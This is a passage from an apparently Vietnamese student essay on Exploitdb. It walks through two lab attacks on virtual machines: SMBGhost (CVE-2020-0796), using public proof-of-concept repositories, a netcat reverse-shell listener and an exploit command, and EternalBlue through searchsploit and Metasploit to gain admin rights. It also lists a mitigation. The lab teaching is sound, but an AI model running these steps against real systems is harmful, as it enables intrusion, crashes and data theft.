.19 Tìm kiếm lỗ hổng

Một phần của tài liệu HỌC PHẦN: AN TOÀN MẠNG BÀI TIỂU LUẬN: Công cụ Exploitdb (Trang 33)

31 | P a g e Công cụ sử dụng Nmap

Máy tấn công Máy ảo Kali linux 64bit , Máy thật Win 10 Đối tượng Máy ảo Win 10

Kịch bản

+Tiến hành rà quét các dịch vụ đang chạy trên máy mục tiêu bằng cơng cụ Nmap.

+Sau đó git clone trên máy kali để thêm các file cve-2020-0796-scanner.py . để tiến hành xác định xem máy ảo win 10 có lỗ hổng đó khơng.

+Trên máy thật win 10 tải file CVE-2020-0796- RCE-POC để thực hiện tấn công

+Chạy file SMBleedingGhost.py để thực hiện exploit máy win 10 ảo

Mục tiêu sau tấn công Thực thi tấn công, gây lỗi reset máy , đánh cắp dữ liệu trên máy ảo win 10

Bảng 5. 3 Môi trường và kịch bản lab 3

Bước 1 : Tiến hành rà quét

Nmap là công cụ ra quét các dịch vụ đang mở trên máy bất kì cụ thể ở máy Win dịch vụ trên port TCP/445 được quét ra.

32 | P a g e

Hình 5. 20Rà quét các dịch vụ trên các port

Bước 2:Git clone https://github.com/ButrintKomoni/cve-2020-0796 trên máy kali .

Sau khi git clone thành công sẽ thực thi các câu lệnh python3 cve-2020- 0796-scanner.py 192.168.1.117 để quét máy ảo win 10 xem có lỗ hổng CVE 2020 -0796 hay không .

33 | P a g e

Hình 5. 21Quét tìm lỗ hổng

Bước 3 : git clone https://github.com/ZecOps/CVE-2020-0796-RCE-POC trên máy kali để cấu hình file SMBleedingGhost.py . Sau đó thực thi lệnh nc –lvp 4444 trên máy kali để ncat sẽ hiển thị một trình bao cung cấp quyền truy cập hệ thống vào máy tính mục tiêu.

34 | P a g e

35 | P a g e

Hình 5. 23nc –lvp 4444

Bước 4 : Tải file CVE-2020-0796-RCE-POC-master.zip tại

https://github.com/ZecOps/CVE-2020-0796-RCE-POC cho máy thật win 10 Sau khi tải thành công thực thi lệnh “SMBleedingGhost.py 192.168.1.117 192.168.1.111 4444” trên cmd để exploit máy ảo win 10

36 | P a g e

Hình 5. 24Thực thi lệnh trên máy thật win 10

Kết quả đạt được : Máy ảo win 10 bị reset

Hình 5. 25Kết quả đạt được

Cách phịng chống : bằng lệnh PowerShell (run as Administrator) và không cần

khởi động lại:

37 | P a g e Set-ItemProperty -Path

"HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 –Force gpupdate /force

Hoặc có thể tắt port 445 trên máy chủ hay sử dụng firewall để chặn port này nếu không sử dụng.

4.Khai thác lỗi SMB : CVE-2017-0144 (ETERNALBLUE)

SMB: CVE-2017-0144 là là một lỗi của giao thức Server Message Block (viết tắt là SMB). Nó có tên gọi khác là ”Lỗ hổng bảo mật thực thi mã từ xa trên giao thức SMB của hệ điều hành Windows”.

SMB: CVE-2017-0144 được phát hiện lần đầu tiên vào ngày 16/03/2017 trong các máy chủ có giao thức Microsoft Server Message Block 1.0 (SMBv1). SMBv1 được đánh giá là lỗi thời, tuy nhiên vẫn tự động được mặc định kích hoạt trên nhiều máy chủ Windows, khiến đây là đích đến cho các cuộc tấn cơng an ninh mạng

Sự nguy hiểm của SMB: CVE-2017-0144:

Lỗi bảo mật SMB: CVE-2017-0144 vô cùng nguy hiểm. Khi máy tính dính phải lỗi này, hệ thống máy chủ sẽ gặp phải phần mềm độc hại ransomware, nhờ vào đây các kẻ tấn công sẽ lợi dụng để tống tiền nạn nhân.

Công cụ sử dụng Nmap

Máy tấn công Máy ảo Kali linux 64bit Đối tượng Máy ảo Win 7

Kịch bản

+Tiến hành rà quét các dịch vụ đang chạy trên máy mục tiêu bằng công cụ Nmap.

+Sử dụng search enternalblue để tìm kiếm modules khai thác lỗ hổng

38 | P a g e +Scan xem có lỗ hổng đó khơng

+ Tiến hành exploit lỗ hổng đó

Mục tiêu sau tấn công Thực thi tấn công, chiếm quyền admin trên máy nạn nhân

Bảng 5. 4 Môi trường và kịch bản lab 4

Bước 1 : Sử dụng lệnh “Searchsploit –w eternalblue” để tìm kiếm lỗi đó :

Hình 5. 20 : Tìm kiếm lỗ hổng

Bước 2 : Rà quét cổng 445/tcp bằng Nmap

Hình 5.26 Rà quét cổng 445

Bước 3 :Sử dụng metasploit framework để khai thác

Sử dụng lệnh”msfconsole” để mở công cụ metasploit framework Tiếp đó sử dụng lệnh “search EternalBlue” để mở các module

39 | P a g e Sử dụng lệnh use 1 để sử dụng module scanner lỗ hổng

Hình 5. 27Scanner lỗ lổng

40 | P a g e

Hình 5. 28 Exploit lỗ hổng

Khai thác lỗ hổng thành công và chiếm được quyền admin

Hình 5.29 Khai thác thành cơng

Từ đó có thể điều khiển máy nạn nhân , khai thác dữ liệu ,….

41 | P a g e

KẾT LUẬN

Qua bài tiểu luận trên, em đã trình bày về các khái niệm tổng quan, đi đến chi tiết cách sử dụng cũng như các bài Lab liên quan tới cơng cụ Exploitdb. Bài tiểu luận có thể vẫn cịn có nhiều sai sót, mong Thầy và bạn đọc có thể đóng góp ý kiến để bài có thể hồn thiện hơn. Em xin cảm ơn!

42 | P a g e

TÀI LIỆU THAM KHẢO

[1] [Online]. Available: https://www.hackingarticles.in/comprehensive-guide-on- searchsploit/.

[2] [Online]. Available: https://www.geeksforgeeks.org/finding-exploit-offline-using- searchsploit-in-kali-linux.

[3] [Online]. Available: https://www.exploit-db.com.

[4] [Online]. Available: https://cuongquach.com/nmap-la-gi-cong-cu-quet-mang.html. [5] [Online]. Available: https://www.totolink.vn/article/154-giao-thuc-ftp-la-gi-nhung-dieu-

ban-chua-biet-ve-giao-thuc-ftp.html.

[6] [Online]. Available: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004- 2687.

Một phần của tài liệu HỌC PHẦN: AN TOÀN MẠNG BÀI TIỂU LUẬN: Công cụ Exploitdb (Trang 33)

Tải bản đầy đủ (PDF)

(45 trang)